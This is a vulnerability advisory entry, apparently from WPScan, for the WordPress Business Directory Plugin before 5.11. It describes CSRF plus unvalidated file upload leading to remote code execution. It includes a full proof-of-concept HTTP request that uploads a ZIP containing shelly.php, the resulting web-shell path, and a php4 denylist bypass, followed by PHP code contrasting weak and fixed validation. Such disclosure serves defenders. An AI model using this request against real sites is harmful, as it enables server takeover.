wpvulndb / 0xB9
WPVDB-ID: C0A5CDDE-732A-432A-86C2-776DF5D130A7
History: Apr 11, 2021 - 12:00 a.m.

Business Directory Plugin < 5.11 - Arbitrary File Upload to RCE

2021-04-11 00:00:00
0xB9
wpscan.com
7

EPSS: 0.001 (Low)
EPSS Percentile: 43.3%

The plugin suffered from a Cross-Site Request Forgery issue, allowing an attacker to make a logged-in administrator import files. As the plugin also did not validate uploaded files, this could lead to RCE. Note (WPScanTeam): a CSRF check and some file validation were added in v5.11; however, a blacklist approach was used to forbid specific file types (such as php), which still allows php4 to be uploaded by a high-privilege user. A separate issue has been created for it.

PoC

POST http://localhost/wp-admin/admin.php?page=wpbdp_admin_csv HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Content-Type: multipart/form-data; boundary=---------------------------31004249213982265192075330464
Content-Length: 2653

-----------------------------31004249213982265192075330464
Content-Disposition: form-data; name="action"

do-import
-----------------------------31004249213982265192075330464
Content-Disposition: form-data; name="csv-file"; filename="Shop search - 1613143091.csv"
Content-Type: application/vnd.ms-excel

stuff,more stuff
-----------------------------31004249213982265192075330464
Content-Disposition: form-data; name="images-file"; filename="test.zip"
Content-Type: application/x-zip-compressed

[binary ZIP archive data, garbled in extraction; the archive contains a single entry named shelly.php]
-----------------------------31004249213982265192075330464
Content-Disposition: form-data; name="settings[csv-file-separator]"

,
-----------------------------31004249213982265192075330464
Content-Disposition: form-data; name="settings[images-separator]"

;
-----------------------------31004249213982265192075330464
Content-Disposition: form-data; name="settings[category-separator]"

;
-----------------------------31004249213982265192075330464
Content-Disposition: form-data; name="settings[post-status]"

publish
-----------------------------31004249213982265192075330464
Content-Disposition: form-data; name="settings[existing-post-status]"

preserve_status
-----------------------------31004249213982265192075330464
Content-Disposition: form-data; name="settings[create-missing-categories]"

1
-----------------------------31004249213982265192075330464
Content-Disposition: form-data; name="settings[append-images]"

1
-----------------------------31004249213982265192075330464
Content-Disposition: form-data; name="settings[assign-listings-to-user]"

1
-----------------------------31004249213982265192075330464
Content-Disposition: form-data; name="settings[default-user]"

1
-----------------------------31004249213982265192075330464
Content-Disposition: form-data; name="settings[batch-size]"

40
-----------------------------31004249213982265192075330464
Content-Disposition: form-data; name="settings[disable-email-notifications]"

1
-----------------------------31004249213982265192075330464
Content-Disposition: form-data; name="do-import"

Import Listings
-----------------------------31004249213982265192075330464--

Upload Path: wp-content/uploads/wpbdp-csv-imports/{last modified}/images/shelly.php

The CSV file must be crafted in a specific way or an error is returned; however, the files are still uploaded on error, so it does not matter. Just a heads up. Images can also be imported from a .ZIP file, inside which a .php file can be placed.
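The two weaknesses in the description, the missing CSRF check and the v5.11 denylist that blocks php but not php4, are easiest to see with the weak and corrected checks side by side. This is an added illustration in the plugin's language, PHP, and not Business Directory Plugin code: the function names, the nonce action and field names, and the archive entry names are assumptions.

```php
<?php
// Added illustration, not Business Directory Plugin code. The function names,
// the nonce names and the archive entry names are constructed for this example.

// Weak check, the denylist approach the advisory note describes: it forbids
// one specific extension, so a sibling extension such as .php4 slips past.
function entry_allowed_by_denylist(string $name): bool {
    $denied = ['php'];
    $ext = strtolower(pathinfo($name, PATHINFO_EXTENSION));
    return !in_array($ext, $denied, true);
}

// Corrected check for an images archive: bare file name only (no directory
// part), allowlisted image extension, and matching image signature bytes.
function entry_allowed_by_allowlist(string $name, string $firstBytes): bool {
    if ($name === '' || $name !== basename($name)) {
        return false; // rejects "../x.png" and "dir/x.png"
    }
    $signatures = ['jpg' => "\xFF\xD8\xFF", 'jpeg' => "\xFF\xD8\xFF",
                   'png' => "\x89PNG", 'gif' => "GIF8"];
    $ext = strtolower(pathinfo($name, PATHINFO_EXTENSION));
    if (!isset($signatures[$ext])) {
        return false; // shelly.php, shelly.php4 and anything else non-image
    }
    return strncmp($firstBytes, $signatures[$ext], strlen($signatures[$ext])) === 0;
}

// Request gate for the import handler, assuming a WordPress runtime: the nonce
// stops the CSRF, the capability check limits who may import at all.
// 'wpbdp-csv-import' and 'wpbdp_csv_import_nonce' are assumed names.
function import_request_is_authorized(): bool {
    return current_user_can('manage_options')
        && wp_verify_nonce($_POST['wpbdp_csv_import_nonce'] ?? '', 'wpbdp-csv-import') !== false;
}

// Constructed archive entries, including the one used in the PoC above.
$entries = [
    ['shelly.php',  '<?php '],
    ['shelly.php4', '<?php '],
    ['logo.png',    "\x89PNG\r\n\x1A\n"],
    ['../logo.png', "\x89PNG\r\n\x1A\n"],
];
foreach ($entries as [$name, $head]) {
    printf("%-12s denylist:%-5s allowlist:%s\n", $name,
        entry_allowed_by_denylist($name) ? 'allow' : 'deny',
        entry_allowed_by_allowlist($name, $head) ? 'allow' : 'deny');
}
```

Running the script shows shelly.php4 passing the denylist while every non-image entry, and the traversal name, fails the allowlist.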

CPE Name                   Operator   Version
business-directory-plugin  lt         5.11

